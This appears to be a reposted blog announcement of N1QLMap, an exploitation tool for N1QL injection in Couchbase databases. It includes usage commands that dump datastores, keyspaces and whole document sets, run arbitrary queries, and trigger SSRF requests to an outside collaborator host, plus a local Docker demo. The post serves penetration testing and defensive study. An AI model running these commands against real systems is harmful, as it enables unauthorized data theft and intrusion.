N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities

N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities
2020-11-27 05:30:00 Author: www.blogger.com(查看原文) 阅读量:164 收藏

tag:blogger.com,1999:blog-8317222231133660547.post-5552586481495620862020-11-26T17:30:00.001-03:002020-11-26T17:30:08.543-03:00N1QLMap - The Tool Exfiltrates Data From Couchbase Database By Exploiting N1QL Injection Vulnerabilities<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1KNienXRIh0/X78pSckzJsI/AAAAAAAAUeo/SrYDmkYOFqg8qBoxgKyNnffzHcEHRPO9gCNcBGAsYHQ/s983/N1QLMap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="655" data-original-width="983" height="426" src="https://1.bp.blogspot.com/-1KNienXRIh0/X78pSckzJsI/AAAAAAAAUeo/SrYDmkYOFqg8qBoxgKyNnffzHcEHRPO9gCNcBGAsYHQ/w640-h426/N1QLMap.png" width="640" /></a></div><p><br /></p><p><code>N1QLMap</code> is an N1QL <a href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> tool. Currently works with Couchbase database. The tool supports data extraction and performing SSRF attacks via CURL. More information can be found here: <a href="https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database" rel="nofollow" target="_blank" title="https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database">https://labs.f-secure.com/blog/n1ql-injection-kind-of-sql-injection-in-a-nosql-database</a>.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Usage</b></span><br /> <br /><span style="font-size: large;"><b>Help</b></span><br /> <pre><code>usage: n1qlMap.py [-h] [-r REQUEST] [-k KEYWORD] [--proxy PROXY] [--validatecerts] [-v]<br /> (-d | -ks DATASTORE_URL | -e KEYSPACE_ID | -q QUERY | -c [ENDPOINT [OPTIONS ...]])<br /> host<br /><br />positional arguments:<br /> host Host used to send an HTTP request e.g. https://vulndomain.net<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> -r REQUEST, --request REQUEST<br /> Path to an HTTP request<br /> -k KEYWORD, --keyword KEYWORD<br /> Keyword that exists in HTTP response when query is successful<br /> --proxy PROXY Proxy server address<br /> --validatecerts Set the flag to enforce certificate validation. <a href="https://www.kitploit.com/search/label/Certificates" target="_blank" title="Certificates">Certificates</a> are not validated by default!<br /> -v, --verbose_debug Set the verbosity level to debug<br /> -d, -- datastores Lists available datastores<br /> -ks DATASTORE_URL, --keyspaces DATASTORE_URL<br /> Lists available keyspaces for specific datastore URL<br /> -e KEYSPACE_ID, --extract KEYSPACE_ID<br /> Extracts data from a specific keyspace<br /> -q QUERY, --query QUERY<br /> Run arbitrary N1QL query<br /> -c [ENDPOINT [OPTIONS ...]], --curl [ENDPOINT [OPTIONS ...]]<br /> Runs CURL N1QL function inside the query, can be used to SSRF<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <ol> <li>Put an HTTP request to <code>request.txt</code> file. Mark an <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> point using <code>*i*</code>. See <code>example_request_1.txt</code> file for a reference.</li> <li>Use one the following commands.</li> </ol> <p>Extracts datastores:</p> <div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores</code></pre></div> <p>Extracts keyspaces from the specific datastore ID:</p> <div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces "http://127.0.0.1:8091"</code></pre></div> <p>Extracts all documents from the given keyspace:</p> <div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample</code></pre></div> <p>Run arbitrary query:</p> <div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id LIMIT 1'</code></pre></div> <p>Perform CURL request / SSRF:</p> <div><pre><code>$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl *************j3mrt7xy3pre.burpcollaborator.net "{'request':'POST','data':'data','header':['User-Agent: Agent Smith']}"</code></pre></div> <br /><span style="font-size: x-large;"><b>Demo</b></span><br /> <p>To play with the <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> you can spin Docker machines with Couchbase and NodeJS web application. If you already met the Requirements, just run the:</p> <div><pre><code>cd n1ql-demo<br />./quick_setup.sh</code></pre></div> <p>Now, you can run command described in <code>Usage</code> section against Dockerised web application.</p> <br /><span style="font-size: x-large;"><b>Requirements</b></span><br /> <p><code>N1QLMap.py</code> script doesn't need any specific <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> apart of Python 3.</p> <p>The following requirements are only for Demo provided in <code>n1ql-demo</code> directory.</p> <ul> <li>Docker</li> <li>Docker Compose</li> </ul> <p>To install Docker and Docker Compose on Kali:</p> <div><pre><code># Docker Installation<br />curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -<br />echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > /etc/apt/sources.list.d/docker.list<br />apt-get update<br /><br />apt-get remove docker docker-engine docker.io<br />apt-get install docker-ce<br /><br /># Start Docker Service<br />systemctl start docker<br /><br /># Docker Compose Installation<br />sudo curl -L "https://github.com/docker/compose/releases/download/1.24.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose<br />sudo chmod +x /usr/local/bin/docker-compose</code></pre></div> <p>Let's test Docker:</p> <div><pre><code>docker run hello-world</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/FSecureLABS/N1QLMap" rel="nofollow" target="_blank" title="Download N1QLMap">Download N1QLMap</a></span></b></div>Zion3R[email protected]

文章来源: http://www.blogger.com/feeds/8317222231133660547/posts/default/555258648149562086
如有侵权请联系:admin#unsafe.sh